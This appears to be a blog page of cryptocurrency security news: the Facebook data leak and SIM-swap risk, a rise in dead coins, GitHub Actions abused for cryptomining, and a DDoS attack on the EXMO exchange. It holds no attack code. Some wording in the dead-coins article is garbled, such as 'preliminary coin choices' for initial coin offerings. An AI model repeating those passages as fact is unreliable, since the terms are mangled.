According to a security analyst, sensitive personal information for over half a billion Facebook users was leaked on a well-trafficked hacking forum on April 3, posing a danger to millions of cryptocurrency traders who may now be susceptible to sim swapping and other identity-based attacks.

What should be done? 

In response to the question that how exactly does this most recent breach place at risk the crypto assets of individuals, Dave Jevans, CEO of blockchain security firm CipherTrace, told Cointelegraph that people who have had their phone numbers leaked need to be extra careful because a lot of fraud involving digital assets hinges on such details. 

He further added, “We’ve seen an increase in SIM swaps, phishing attacks, and other types of fraud involving cryptocurrencies that rely on acquiring the phone numbers of victims to execute. Leaked info about the identity of high-profile crypto users gave bad actors the ability to target them.” 

Ben Diggles, co-founder, and chief revenue officer at Constellation, told Cointelegraph that Facebook's latest security lapse is unsurprising, especially given that most Facebook users have a different approach, in which they prefer their world to be managed and structured for them. 

“Those that are crypto holders that were on the list have little to worry about unless they were storing descriptive details of their holdings and access on their Facebook account. However, these hackers have gotten really sophisticated, so I have no idea what tricks they may have [up] their sleeves with regards to scraping info specific to crypto wallets and exchanges.”, he added. 

However, he suggests that most users should update their passwords for all of their social media profiles, as well as all other sites that share their data with Facebook, as a precaution. 

Does decentralization matter? 

As more data leaks occur, a large majority of people around the world are understanding the value proposition that decentralized systems offer in terms of protection, particularly, since they do not feature a single point of failure. 

On the matter, Eli Arkush, a cloud solutions engineer at cybersecurity firm GlobalDots, suggests that having a platform's backend system distributed using blockchain technology could make it more difficult for hackers to obtain user information; however, once credentials fall into the wrong hands, password reuse may become a concern. 

However, Stephen Wilson, the CEO of Lockstep Group and a member of the Australian government's National Blockchain Roadmap Cybersecurity Working Group, believes that, contrary to popular belief, storing personal information on any blockchain ecosystem is never a good idea. He pointed out that the type of personal data breached by Facebook should never be stored in a blockchain, and even if it is, such data can never be completely protected by blockchain in the long run.

“Blockchain and DLTs usually only decentralize some aspects of data management. They don’t usually decentralize data storage in any relevant sense because they tend to duplicate ledger entries across multiple systems. The storage is distributed, but identical copies of information are available in multiple locations and can be vulnerable to attackers or thieves.”, he further added. 

Most hacking schemes in the past have primarily focused on stealing funds from cryptocurrency exchanges. For example, in 2014 and 2018, the total amount of money compromised as a result of exchanges being hacked was $483 million and $875 million, respectively. 

However, an increasing number of offenders are focusing their attention on stealing user data because it provides them with unique opportunities to obtain funds quickly. As a result, cryptocurrency owners must protect their assets.

Goodbye Cryptocurrencies: Number of 'Dead' Coins Increased by 35% Over Last Year

 

Coinopsy.com, an online firm that tracks dead cryptocurrencies has published a data report regarding the number of dead cryptocurrencies or crypto coins. Interestingly, there is a huge surge in the number of dead cryptocurrencies or crypto coins that had minimal to zero profits for everyone. 

According to the data report from Coinopsy.com, the number increased by 35% over last year to 1,949. Around February last year, the total number of dead coins exceeded 1,440. The term dead coins are associated with a cipher that no longer exists for multiple reasons. For example, they are used as a scam, their internet site remains down, there’s a problem with a node or wallet, it’s illiquid or it’s just abandoned, or it’s been stopped by a developer. 

However, if there’s a lack of information on the reasons why a coin died, it falls into the default deserted category. The growth within the quantity of such dead coins had gained momentum again in 2017 when a lot of entrepreneurs or firms went for preliminary coin choices (ICO) and had raised $4.9 billion through the year, as per the reports of Crunchbase. ICOs are meant to develop new blockchain-based cryptos or related apps or companies.

According to CoinMarketCap, ICOs had increased the number of existing coins from 29 to more than 850 projects in 2017. In December last year, the whole cryptos had reached close to 8,000. As of March 3, 2021, there were 9,108 ciphers led by Bitcoin and Ethereum were in circulation. However, many of these coins are no longer present because they never have been scammed, joked, or evolved.

Joke projects and coins have no real or concrete idea, but they are still looking for an investment. For example, according to CoinMarketCap, the Useless Ethereum Token (UET) was one such joke coin that held an ICO and raised over $300,000. The total market capitalization of over 9,000 cryptocurrencies is $1.96 trillion, of which Bitcoin commands a 60 percent share ($1.1 trillion) and Ethereum has an 11% share ($243 billion).

Attackers found abusing GitHub Infrastructure to Mine Cryptocurrency

 

Microsoft-owned GitHub is the new cyberattack victim, with reports of cybercriminals manipulating GitHub's cloud infrastructure to mine cryptocurrency. Code repository hosting service, Github has started an investigation into a series of attacks aimed at abusing its infrastructure to mine cryptocurrency illegally. 

GitHub Actions is a continuous integration (CI) and continuous deployment (CD ) solution that makes it easy to automate all the software workflows and setup periodic tasks. The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code. 

“In a phone call, Dutch security engineer Justin Perdok told The Record that at least one threat actor is targeting GitHub repositories where Actions might be enabled. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original.” reported The Record. 

“But the attack doesn’t rely on the original project owner approving the malicious Pull Request. Just filing the Pull Request is enough for the attack, Perdok said.” This is particularly true for GitHub projects that have automated workflows setup to substantiate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner. 

This isn't the first time an attack leveraging GitHub infrastructure has abused GitHub Actions. An identical attack had previously been identified by another programmer, Yann Esposito, in which an attacker had filed a malicious Pull Request against Esposito's GitHub project. 

Last year, BleepingComputer reported on GitHub being used to host a wormable botnet Gitpaste-12, which reappeared with over 30 exploits the following month. Unlike Gitpaste-12 or the Octopus Scanner malware, which targeted vulnerable projects and computers, this attack appears to be solely abusing on GitHub servers for crypto mining.

In an email, GitHub told The Record that they are “aware of this activity and are actively investigating”. For now, the attack does not appear to damage users’ projects in any way and seems to be solely focused on abusing GitHub infrastructure.

UK Cryptocurrency Exchange EXMO Suffers a 'Massive' DDoS Assault

 

Cryptocurrency exchange EXMO, a British company was targeted in a distributed denial-of-service (DDoS) attack. As a precautionary measure company has shut down its servers temporarily. The company also said in a notification that it suffered a distributed denial-of-service attack on February 15, when its website was offline for two hours.

EXMO’s spokesperson said that the previous DDoS assaults only affected the website but this attack is quite different from previous attacks due to its potency and capability to drive 30 GB of traffic per second affecting the whole network system, including the website, API, Websocket API, and exchange charts. The assault was combated with the help of DDoS protection Qurator and the company has also beefed up the security to avoid any further damage. 

This was the second assault on the company in the last two months, on December 24, threat actors attacked the company and earned 5% of EXMO’s assets from their ‘hot’ wallets. Later, the company confirmed that it has suffered a loss of about $4 million in customer cryptocurrency; currently, there are no proofs to establish the motives behind both the attacks but it is suspected that due to the bitcoin price hit records high, threat actors tried to cash in on the higher value of the stolen assets.

EXMO released an update regarding the developments in an investigation wherein they mentioned, “Our team is currently developing a new infrastructure for hot wallets. Since each blockchain needs a separate server, the process will take some time, once deposits and withdrawals are available, you will have to generate a new wallet address in the ‘Wallet’ section of your account. Our investigation is ongoing, and we are taking all necessary and precautionary measures to prevent such incidents from reoccurring.” 

The company was launched in 2013 and is headquartered in London. Due to Britain’s exit from the European Union, EXMO had chosen to establish their brand into new European bases as part of a contingency plan. The company was registered with the UK Financial Conduct Authority (FCA) for a brief stint as a crypto asset business until July 9th, 2021, following a request submitted back in April 2020. 

EXMO has expanded its reach outside the UK in a very short span of time and the company’s offices are in Kyiv, Barcelona, Moscow, and Istanbul.